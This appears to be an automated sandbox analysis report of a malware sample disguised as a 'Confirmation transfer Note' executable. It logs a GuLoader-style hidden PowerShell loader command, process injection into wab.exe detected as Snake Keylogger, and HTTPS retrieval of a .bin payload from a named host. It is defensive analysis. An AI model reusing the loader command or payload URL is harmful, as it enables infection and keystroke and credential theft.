69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49707	108.167.181.251	443	7476	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 01:10:19 UTC	203	OUT	GET /wp-includes/NTivwvgavzbeiE97.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.reap.skyestates.com.mt Cache-Control: no-cache
2024-07-25 01:10:19 UTC	249	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 01:10:19 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 23 Jul 2024 12:31:49 GMT Accept-Ranges: bytes Content-Length: 273472 Content-Type: application/octet-stream
2024-07-25 01:10:19 UTC	7943	IN	Data Raw: 8d 14 96 a8 ea 47 a9 d0 54 13 1f 90 f9 ce d3 da 20 c5 96 82 2a c9 c4 01 52 3c 49 da ef 4c 54 c5 30 82 a7 2e 4e 40 29 0c c3 0d 4a 2f 26 e5 1d 37 c0 95 31 c3 2e 18 72 9d de 40 98 08 20 10 50 e1 1e 53 4b 7f cd 1d e9 5d 55 ae 7d 4b 2c 67 aa 73 93 e1 0b 47 8c 13 5a 46 f5 48 49 b4 a0 d4 4f b3 02 14 eb ba 68 a6 3b 88 9e 9e e2 0f 59 dd 24 66 d0 90 ad 05 a5 bc 84 5a 32 d6 8d 67 9d 40 66 8d 80 cd 9a 4f 9a da fb 26 99 b2 04 e0 dd 2f 45 58 43 48 30 33 89 b7 7f 90 1f a1 cf 83 ca 3d 54 52 36 5b 6d 14 4b e2 8f 07 75 07 6f 06 bd b2 e5 cb 8a 4f 37 de 49 ff e6 cd ae 8a b1 26 c1 9a f7 fc 48 53 1b 34 1e e0 f2 a8 64 0e d2 d8 42 19 d3 4d ba 33 91 c9 a1 d8 9d 81 70 4d db b5 b5 af 68 f1 01 b4 4a 5e 28 c6 81 83 6f 87 71 5a 34 83 6a cd 4f 1a 99 1f fd 0b 62 40 05 98 0a 51 dc 7a e2 Data Ascii: GT *R<ILT0.N@)J/&71.r@ PSK]U}K,gsGZFHIOh;Y$fZ2g@fO&/EXCH03=TR6[mKuoO7I&HS4dBM3pMhJ^(oqZ4jOb@Qz
2024-07-25 01:10:19 UTC	8000	IN	Data Raw: 74 d9 96 46 6f a6 16 99 5f 5d e9 14 ca ad 3b 7b 20 1d 24 f7 bd 7f 9f 54 2c 6f 35 17 ab 4f 13 39 ec a5 8a 85 94 43 7f cd 1b 7e 98 5a 0e 2a c8 48 b3 f4 da c2 51 14 70 00 f8 50 f4 5e 15 a3 20 0a 38 9a 6b 56 14 93 e2 1a c3 a5 c5 f0 73 fb 07 b8 5f 51 33 cc 8a 3a a1 04 43 d8 0a 88 a8 1c ae 17 da 97 df 0a cf f4 72 c7 f1 2d 51 0d 81 5b 2f 89 d9 ee 60 a0 2e 23 db 3b b7 87 d1 0d 61 0d 19 40 37 3a 82 8f 61 fe b7 34 cf aa bc 8c 85 cd 71 ce 20 08 7b a3 3d fc 8c 6c ea 7a a2 fe 3e 75 6a 07 50 ad 81 15 6d c6 6c 49 de 2e 31 51 89 01 5e a0 9f 5e f7 d4 a3 aa 9d 1b 20 d4 6f 46 51 75 a6 dc af 1e ae ca 44 6f 61 4c 94 0f cc ae 23 0b a8 67 21 26 a2 ce 94 de 1a eb 38 6d ff c6 9c 52 2f 6c 2a 38 bc 09 6b 53 0c 86 03 c0 6c 3c 33 9d bb 2a ac 3b 0d 69 f3 c7 3d d8 4a d6 1f cd 30 c8 b6 Data Ascii: tFo_];{ $T,o5O9C~ZHQpP^ 8kVs_Q3:Cr-Q[/`.#;a@7:a4q {=lz>ujPmlI.1Q^^ oFQuDoaL#g!&8mR/l8kSl<3*;i=J0
2024-07-25 01:10:19 UTC	8000	IN	Data Raw: e9 67 00 1c f9 07 92 2d 62 57 92 6c f3 d8 9d 50 f4 ff a5 8d 06 ba 2e 4d a1 ce c4 10 9e 98 93 62 77 51 e8 4e ec fe 24 be e3 54 8a 37 7b 40 dd 68 04 94 5e 34 fc 36 bd 41 eb c2 c7 a4 ce 15 e4 ca c3 9b 7f 77 78 82 e6 58 80 51 e2 b8 6a 0b f9 56 76 f9 42 d7 9c c4 63 8d bd f6 26 75 db f2 7b b9 a5 2a 6e ce 67 12 81 99 3b 38 89 28 62 8d 9e bb 16 34 ed 9e e3 9d c4 0e c5 28 89 87 25 b7 69 cf aa 6b 95 80 8b 6b f7 13 81 f4 0a 31 6e 2f c9 82 e5 f5 cf c1 36 c8 81 8c 55 dc 73 9e 86 8f 49 76 bc 52 4c c0 c3 80 4f 09 7c b0 9d 11 11 0f 0b 56 2a d7 45 50 5e 37 a5 bb 8a 64 c3 55 19 f5 b5 5d b0 02 ff 83 d0 55 d8 04 9d 0b 06 15 87 cb a9 a6 ea f0 12 8f 09 de b9 cd 2a 21 d4 d7 98 4b 98 d3 54 6a 07 89 ea d2 06 2b e1 95 1a 40 cf 56 6b 98 49 4a 3e db b7 f6 3d 53 ae 59 02 da 79 54 b6 Data Ascii: g-bWlP.MbwQN$T7{@h^46AwxXQjVvBc&u{ng;8(b4(%ikk1n/6UsIvRLO\|VEP^7dU]U*!KTj+@VkIJ>=SYyT
2024-07-25 01:10:19 UTC	8000	IN	Data Raw: bb 78 1b b1 ae 57 ed aa a1 76 ad 33 0f bd ed 9a 27 84 9e 80 2f 95 2d 40 29 27 f0 ea 78 2c c0 aa 19 b8 ed 9f 61 7d 46 cc 79 fb 85 43 73 b8 b2 23 6b ca b0 94 d2 db 70 27 c2 93 25 6f 4f 26 76 dc f6 bf 33 13 77 2e c6 a0 f9 8a 85 9a 20 3e cc fd 85 de e5 7e 46 f7 3e a6 76 ad 58 1b c6 91 76 9a 29 57 e0 0a 04 66 6c e3 02 66 1c b1 3e e6 10 39 32 ff 9d 78 39 8d 08 bf 07 09 57 3c cd 5a 91 02 69 75 49 00 0b 8c f2 f9 fb d1 05 eb 87 15 ec f7 01 a3 0d 8b 92 b1 95 cd fa 67 55 6d a9 ef c6 96 7a 18 b9 31 2c b0 1b 8c dd 97 b4 b2 cb 49 93 4e 59 b6 70 42 89 48 1e df 83 a3 f4 09 e6 da be 12 79 bb 2f 6a 3c 6d 6c 63 ee 62 45 04 73 b0 2c f8 f7 d3 22 ea a3 f2 ea f5 51 62 51 6a d0 7b c0 0f ad 5a 9f 24 0e b0 ed d5 86 30 52 5c b7 c5 02 52 de fb 05 ce ae 5f 25 81 2a 2d 38 e6 28 6c c0 Data Ascii: xWv3'/-@)'x,a}FyCs#kp'%oO&v3w. >~F>vXv)Wflf>92x9W<ZiuIgUmz1,INYpBHy/j<mlcbEs,"QbQj{Z$0R\R_%*-8(l
2024-07-25 01:10:19 UTC	8000	IN	Data Raw: b6 80 92 cb 2e 2d 52 f2 c9 ee f2 c3 1d e0 36 70 ca c8 be d7 0a de 19 cf d2 55 71 20 32 ec bb 0e 10 04 64 38 d8 b4 67 79 df 21 de 36 90 31 94 a5 d2 71 0c dc 9c 29 56 ee 4a 51 02 c4 7f 98 3f c7 e0 67 2c 1e 3b dc 70 bf 54 3f 4b aa 72 18 8f 89 9e be 87 ca 01 c8 9c d6 24 54 10 63 72 0f a7 5b 6d 87 fb 7f 8f 03 c8 06 96 43 5b 2b 29 ba 0e 77 e8 12 ef 96 c1 63 37 5e 3e 91 b9 b3 14 e1 c6 80 72 ec 6c 0b 58 38 3b 44 0e 25 4d 56 c5 9e 32 f6 3f 06 59 28 e8 52 f8 86 9b 6d 80 0f 37 b7 5a 65 b1 43 67 41 22 2f 77 a8 2c ef 56 a2 08 27 f6 74 45 ef c8 43 c5 2e 09 19 bd 3f 73 d3 c8 61 99 7a b8 be 5a 6c 42 fd b0 6f b9 48 32 eb 23 0b 64 5e 3e 4b 60 02 64 37 09 21 78 60 d1 5a c5 8e 05 4a e0 1c c5 f6 9e 92 66 64 3e 84 a7 ea 64 16 81 27 86 30 cf c1 1f cd c6 25 93 ea 8b b4 e6 e3 a1 Data Ascii: .-R6pUq 2d8gy!61q)VJQ?g,;pT?Kr$Tcr[mC[+)wc7^>rlX8;D%MV2?Y(Rm7ZeCgA"/w,V'tEC.?sazZlBoH2#d^>K`d7!x`ZJfd>d'0%
2024-07-25 01:10:19 UTC	8000	IN	Data Raw: 41 b4 5d 47 35 a3 60 c6 48 63 d2 1e fd 0b 24 33 29 ba 0a 57 d0 70 90 87 72 81 80 b7 8f 6f e4 f7 06 55 82 91 c7 ef 7d 81 38 47 d6 7f b7 b5 da 16 9d 9a 8e fe 06 91 7f 42 37 54 5d 35 cd 4e cb 3f c2 f8 9b 3f b0 91 5c f3 95 5f 53 c7 4c d5 a4 54 eb 96 b2 0a a0 66 18 42 c6 cb 0f db 12 1f 36 fa 04 fe 84 08 47 2d ef 87 e9 9e b6 e9 df 1d 3a e8 86 ff 21 78 ee a6 64 03 75 21 92 d0 f8 71 89 8a 81 b8 e7 c7 4b 1d 59 83 e6 9b 3a a9 bd 0c 93 4f 7d 13 76 2e fe 77 36 78 2d 3d d5 5f 5c c6 2a d6 0d 1e 6e 36 05 21 ec 24 04 9c 47 20 5b 2e 2c 21 42 fb 3f fb 87 2e 83 fb 15 59 dc 17 79 05 5f 19 03 c2 5f a5 e4 40 ea 6a 3f 65 0a dc ac 86 3c 10 b2 56 0a d2 9a 6b 56 31 f6 ba 1b c5 c6 d0 f4 65 9f 3d f8 5f 5b 21 ee b7 50 25 29 2c 10 a8 ad b5 61 88 32 c2 e4 75 25 de 8c bf 5b e8 3c 5f bc Data Ascii: A]G5`Hc$3)WproU}8GB7T]5N??\_SLTfB6G-:!xdu!qKY:O}v.w6x-=_\*n6!$G [.,!B?.Yy__@j?e<VkV1e=_[!P%),a2u%[<_
2024-07-25 01:10:19 UTC	8000	IN	Data Raw: ed eb 00 d2 48 26 ee d5 d7 30 f7 19 25 b0 34 3b a1 a9 2e 71 d2 90 ed 81 63 77 60 25 a6 5d 72 9c 56 42 07 a7 d4 25 11 8d 00 16 03 cf 67 d6 47 c7 31 a6 79 57 ff db cd 95 fa f7 2d b4 6a 15 e2 ce 2c 93 ef 33 2d 9d 78 a2 fd 09 99 78 33 9e 6b 9f aa 34 50 45 78 ed 84 8e e6 14 de 37 ca 7e 71 20 b2 0f 83 78 32 76 ab 2d 47 c8 bf fe 6a a6 ea 76 83 fa 1e 46 e0 24 24 c2 59 0e 79 00 54 94 9a ad a1 b1 72 a7 2d ef ea c5 45 60 30 87 9a 5d 12 e9 32 fb e8 9b 8b 4e 00 89 a5 b7 34 1c 6f 81 6c f7 7a d8 4b 86 ef c6 8c 76 18 1b 56 df d2 81 10 9a f6 7d 52 73 5b cf 6a f0 8c b8 aa e3 35 28 00 1b 68 c4 63 17 bb 52 ed c1 36 c9 1b 38 d1 c7 de b6 75 f4 e2 ae f5 cc 7d 73 8f cc 31 90 77 f3 9b 31 18 fb 56 76 f5 4a a5 2a e2 49 fd d2 90 b0 75 dd d6 73 d6 8d 30 6f c8 70 e9 92 9e 2d 12 80 10 Data Ascii: H&0%4;.qcw`%]rVB%gG1yW-j,3-xx3k4PEx7~q x2v-GjvF$$YyTr-E`0]2N4olzKvV}Rs[j5(hcR68u}s1w1VvJ*Ius0op-
2024-07-25 01:10:19 UTC	8000	IN	Data Raw: cb 36 fd 6e fb 12 cb d9 f4 52 9f 02 d3 d8 a4 15 11 91 ff 43 fc 12 fd 42 ba 5a 08 d6 77 42 98 f4 b3 17 8f 48 b9 2a 86 ea bf a6 c3 ae 3c e8 61 85 9b 2b 70 29 82 22 75 90 a6 94 2b 00 b5 5e 40 e7 5d 69 2a 4a 50 57 7a 9b ca e8 51 8a c1 d8 b7 c7 4e 7e 36 65 05 bf c8 3a 57 56 10 2d 3e 7e e7 bd 63 f3 ac af f3 7b 93 3a 94 11 d7 7f f0 df 84 2a 06 01 52 75 26 4b 3b 6c 86 73 b7 d8 85 85 c0 9c 7f aa 5c d1 10 0d 6c bb 29 8c 3a d9 f7 de 26 6a 96 86 b7 c1 c9 39 cd 86 35 e7 b9 a6 d6 8a 33 0f b9 82 b9 0f cd 9a f2 13 04 0a 30 3f 0b 78 ea 69 21 c1 82 0b ac f7 89 7b 42 41 74 87 04 7a 57 8d 60 9f 06 43 f8 c3 53 d8 c8 74 0f 22 f1 25 65 45 8b bf dc dc b5 61 03 66 22 b8 9a f9 8a 92 e9 ea 3e b2 f6 ea 15 74 7f 4c f7 3f aa 19 61 1d 1b cc ee 50 aa 2c 53 2c c6 04 66 5d e3 13 7b 6e 56 Data Ascii: 6nRCBZwBH<a+p)"u+^@]iJPWzQN~6e:WV->~c{:*Ru&K;ls\l):&j9530?xi!{BAtzW`CSt"%eEaf">tL?aP,S,f]{nV
2024-07-25 01:10:19 UTC	8000	IN	Data Raw: 4d bc a3 ef 81 1f e3 8b 18 45 d4 27 0a 40 2b b4 57 29 3e 1c fb fa 5d ea ec 5e d0 9d b9 02 5d 51 ad 4d 70 1e 0b 83 99 d9 0e 8a aa e4 3b d9 06 e5 1b 8f 97 73 78 1a 56 cb 8c 28 26 20 b1 dc f5 02 d7 d6 4c 2c 67 d1 3c d7 39 27 8c 82 7b 99 5d d5 3a 84 85 fd d4 d8 1c c0 43 b7 ac c6 1e 21 37 c4 3b 33 a2 8b 4c ff 7c 83 a3 b1 10 6e f7 f5 c6 8a cb 15 28 cb d5 b2 84 71 93 9c 27 f8 15 6b a8 63 8b c0 af a6 b0 87 f7 1a 83 2b dc 19 f5 6f 51 fb 57 3b bd be b6 94 b9 ea bb 51 82 a6 d4 f0 c3 1b a8 3e 61 cc ba 60 99 0a ec 73 e5 d0 e5 77 33 36 16 af 09 62 1e 2b 38 a8 9e 4d 7b de 27 ac 1a df 38 e0 ad c3 8b 7f ec d3 2f 20 81 60 43 02 c2 57 86 3f c7 eb 74 29 0f 3f c1 65 bd 54 85 58 a2 63 e1 a5 ca 98 86 a6 cb 01 87 f3 f4 24 4f 2a 08 51 e7 a7 51 45 84 f9 7f 98 10 c1 0b 12 17 a5 2a Data Ascii: ME'@+W)>]^]QMp;sxV(& L,g<9'{]:C!7;3L\|n(q'kc+oQW;Q>a`sw36b+8M{'8/ `CW?t)?eTXc$OQQE
2024-07-25 01:10:19 UTC	8000	IN	Data Raw: 19 15 46 c5 27 63 b6 a0 d2 3d 9f 4d 14 9b b2 79 a1 49 b8 d1 9e 92 60 73 df 24 60 f8 cb ad 05 af af 81 4b 36 fe 9e 65 1d 46 75 85 9f da 0c 02 9c 46 d3 ea b8 00 6a 8e 11 0e 1b 5f 09 3a 10 49 d3 cc 1a e2 78 df e6 f1 a2 47 c4 3c 51 71 1e 7b 7d 6e fb 7a 5e 7f 0a 0a ef d5 4d eb e7 2a 42 bf 08 ae eb c7 80 9b b8 0e d4 98 f7 fa 0b 12 1b 34 52 ca d1 a8 c4 73 42 be 48 11 c2 4a c8 ed df c9 31 b7 b5 82 7b 4a e4 e9 b5 b9 66 d9 16 a2 4a 58 3b c2 81 8a 33 e8 74 5a 44 b5 42 45 4f 5a 97 09 03 08 33 44 77 e2 0b 51 ac 6e ca b9 54 81 fa ce 56 6e bb e0 25 2f b7 b8 c5 9f 6d be 6a 54 d1 63 b2 43 e1 69 8f 96 9f fa 3b d4 10 09 51 54 2d 5b c2 5a b9 aa a0 f0 fa 95 e7 5e 73 51 c0 28 0b 26 03 d3 c7 f2 c6 9e ab 7c e0 65 02 40 aa b1 0d ab b6 29 28 e3 10 54 d3 f8 13 2a b7 e8 b3 3e 9e 93 Data Ascii: F'c=MyI`s$`K6eFuFj_:IxG<Qq{}nz^MB4RsBHJ1{JfJX;3tZDBEOZ3DwQnTVn%/mjTcCi;QT-[Z^sQ(&\|e@)(T>

Target ID:	0
Start time:	21:09:38
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"
Imagebase:	0x400000
File size:	868'928 bytes
MD5 hash:	BAF114AC8DAB2634A6F9E33CC67C4B33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:09:41
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "
Imagebase:	0x4b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1634084936.000000000A494000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:09:41
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	23:06:52
Start date:	24/07/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x920000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	23:07:02
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532
Imagebase:	0xf80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.1%
Total number of Nodes:	1283
Total number of Limit Nodes:	35

Executed Functions

Function 00403358 Relevance: 77.3, APIs: 27, Strings: 17, Instructions: 335
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNELBASE(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",00000000), ref: 004033D9
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040351A
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040353A
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040355B
DeleteFileW.KERNELBASE(1033), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp), ref: 0040364B
lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ",?), ref: 004036C4
CopyFileW.KERNEL32(C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,0041FE90,00000001), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

\Temp, xrefs: 00403520
Error launching installer, xrefs: 004035D6
~nsu.tmp, xrefs: 00403645
SeShutdownPrivilege, xrefs: 0040376D
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004034FE, 00403503, 00403519, 00403525, 00403534, 00403541, 0040354D, 00403555, 0040364A, 00403656, 00403662, 00403669, 0040371A
Low, xrefs: 0040353C
C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen, xrefs: 004035FC
';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", xrefs: 00403688
1033, xrefs: 0040356A
TEMP, xrefs: 0040354E
C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 004034EE, 004035F1, 00403670, 0040367A
C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe, xrefs: 004036D3
"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", xrefs: 004033CC, 004033D2, 00403593
C:\Users\user\Desktop, xrefs: 00403650, 00403655, 00403679
TMP, xrefs: 00403556
NSIS Error, xrefs: 004033B7
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen$C:\Users\user\Desktop$C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-591496453
Opcode ID: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
